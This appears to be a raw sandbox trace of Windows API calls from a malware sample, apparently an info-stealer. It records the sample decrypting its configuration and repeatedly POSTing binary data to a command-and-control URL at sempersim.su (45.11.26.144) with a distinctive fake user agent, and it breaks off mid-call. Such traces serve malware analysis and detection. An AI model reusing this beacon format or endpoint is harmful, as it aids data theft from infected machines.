(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0193.183] GetProcessHeap () returned 0x5b0000 [0193.183] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0193.183] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0193.183] GetProcessHeap () returned 0x5b0000 [0193.183] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0193.183] GetProcessHeap () returned 0x5b0000 [0193.184] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0193.184] GetProcessHeap () returned 0x5b0000 [0193.184] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0193.184] GetProcessHeap () returned 0x5b0000 [0193.184] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0193.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.186] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0193.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.197] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0193.205] GetProcessHeap () returned 0x5b0000 [0193.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0193.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.206] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0193.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.207] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0193.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.208] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.208] GetProcessHeap () returned 0x5b0000 [0193.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0193.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.209] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0193.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.211] CryptDestroyKey (hKey=0x5be288) returned 1 [0193.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.211] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0193.211] GetProcessHeap () returned 0x5b0000 [0193.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0193.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0193.212] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0193.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0193.213] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0193.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0193.214] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0193.214] GetProcessHeap () returned 0x5b0000 [0193.214] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0193.214] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cddb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0193.215] GetProcessHeap () returned 0x5b0000 [0193.215] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa70 [0193.215] socket (af=2, type=1, protocol=6) returned 0x2f4 [0193.215] connect (s=0x2f4, name=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0193.290] FreeAddrInfoW (pAddrInfo=0x5cddb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0193.290] GetProcessHeap () returned 0x5b0000 [0193.290] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0193.290] GetProcessHeap () returned 0x5b0000 [0193.290] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0193.291] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0193.291] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0193.291] GetProcessHeap () returned 0x5b0000 [0193.291] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0193.292] GetProcessHeap () returned 0x5b0000 [0193.292] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0193.292] GetProcessHeap () returned 0x5b0000 [0193.292] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2ff0 [0193.292] GetProcessHeap () returned 0x5b0000 [0193.292] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0193.293] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0193.294] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0193.294] GetProcessHeap () returned 0x5b0000 [0193.294] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0193.294] GetProcessHeap () returned 0x5b0000 [0193.294] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0193.294] send (s=0x2f4, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0193.295] send (s=0x2f4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0193.295] GetProcessHeap () returned 0x5b0000 [0193.295] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0193.295] recv (in: s=0x2f4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0194.391] GetProcessHeap () returned 0x5b0000 [0194.392] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0194.392] GetProcessHeap () returned 0x5b0000 [0194.392] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0194.392] GetProcessHeap () returned 0x5b0000 [0194.393] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0194.393] GetProcessHeap () returned 0x5b0000 [0194.393] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0194.393] closesocket (s=0x2f4) returned 0 [0194.394] GetProcessHeap () returned 0x5b0000 [0194.394] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa70 | out: hHeap=0x5b0000) returned 1 [0194.394] GetProcessHeap () returned 0x5b0000 [0194.395] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0194.395] GetProcessHeap () returned 0x5b0000 [0194.395] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0194.395] GetProcessHeap () returned 0x5b0000 [0194.396] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0194.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xdf4) returned 0x2f4 [0194.398] Sleep (dwMilliseconds=0xea60) [0194.406] GetProcessHeap () returned 0x5b0000 [0194.406] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0194.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.407] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0194.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.414] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0194.492] GetProcessHeap () returned 0x5b0000 [0194.492] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0194.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.493] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0194.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.493] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0194.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.494] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.494] GetProcessHeap () returned 0x5b0000 [0194.495] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0194.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.495] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0194.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.496] CryptDestroyKey (hKey=0x5bde08) returned 1 [0194.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.497] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0194.497] GetProcessHeap () returned 0x5b0000 [0194.497] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0194.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0194.498] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0194.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0194.499] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0194.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0194.535] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0194.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0194.536] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0194.536] GetProcessHeap () returned 0x5b0000 [0194.536] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb128 [0194.536] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0194.537] GetProcessHeap () returned 0x5b0000 [0194.537] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb128 | out: hHeap=0x5b0000) returned 1 [0194.537] GetProcessHeap () returned 0x5b0000 [0194.537] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0194.537] GetProcessHeap () returned 0x5b0000 [0194.538] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0194.538] GetProcessHeap () returned 0x5b0000 [0194.538] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3308 [0194.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.539] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0194.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.545] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0194.638] GetProcessHeap () returned 0x5b0000 [0194.638] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0194.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.639] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0194.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.644] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0194.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.645] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.645] GetProcessHeap () returned 0x5b0000 [0194.646] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0194.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.646] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3308, pdwDataLen=0xdfcfc | out: pbData=0x5d3308, pdwDataLen=0xdfcfc) returned 1 [0194.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.647] CryptDestroyKey (hKey=0x5bde08) returned 1 [0194.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0194.648] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0194.648] GetProcessHeap () returned 0x5b0000 [0194.648] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0194.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0194.649] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0194.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0194.650] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0194.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0194.650] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0194.650] GetProcessHeap () returned 0x5b0000 [0194.650] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0194.650] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce150*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0194.652] GetProcessHeap () returned 0x5b0000 [0194.652] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9e0 [0194.652] socket (af=2, type=1, protocol=6) returned 0x2f8 [0194.652] connect (s=0x2f8, name=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0194.734] FreeAddrInfoW (pAddrInfo=0x5ce150*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0194.735] GetProcessHeap () returned 0x5b0000 [0194.735] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0194.735] GetProcessHeap () returned 0x5b0000 [0194.735] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0194.735] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0194.736] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0194.736] GetProcessHeap () returned 0x5b0000 [0194.736] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0194.736] GetProcessHeap () returned 0x5b0000 [0194.736] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0194.736] GetProcessHeap () returned 0x5b0000 [0194.736] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3470 [0194.736] GetProcessHeap () returned 0x5b0000 [0194.736] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0194.737] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0194.738] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0194.738] GetProcessHeap () returned 0x5b0000 [0194.738] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0194.738] GetProcessHeap () returned 0x5b0000 [0194.738] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0194.738] send (s=0x2f8, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0194.739] send (s=0x2f8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0194.740] GetProcessHeap () returned 0x5b0000 [0194.740] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0194.740] recv (in: s=0x2f8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0195.721] GetProcessHeap () returned 0x5b0000 [0195.722] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0195.722] GetProcessHeap () returned 0x5b0000 [0195.722] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0195.722] GetProcessHeap () returned 0x5b0000 [0195.722] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0195.722] GetProcessHeap () returned 0x5b0000 [0195.723] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0195.723] closesocket (s=0x2f8) returned 0 [0195.724] GetProcessHeap () returned 0x5b0000 [0195.724] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9e0 | out: hHeap=0x5b0000) returned 1 [0195.724] GetProcessHeap () returned 0x5b0000 [0195.724] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0195.724] GetProcessHeap () returned 0x5b0000 [0195.724] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3308 | out: hHeap=0x5b0000) returned 1 [0195.724] GetProcessHeap () returned 0x5b0000 [0195.725] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0195.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xdec) returned 0x2f8 [0195.727] Sleep (dwMilliseconds=0xea60) [0195.735] GetProcessHeap () returned 0x5b0000 [0195.735] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0195.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.736] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0195.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.741] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0195.747] GetProcessHeap () returned 0x5b0000 [0195.747] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0195.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.748] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0195.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.750] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0195.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.756] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.756] GetProcessHeap () returned 0x5b0000 [0195.756] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0195.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.757] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0195.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.758] CryptDestroyKey (hKey=0x5be048) returned 1 [0195.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.759] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0195.759] GetProcessHeap () returned 0x5b0000 [0195.759] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0195.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0195.760] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0195.761] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0195.762] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0195.763] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.763] GetProcessHeap () returned 0x5b0000 [0195.763] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0195.763] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: 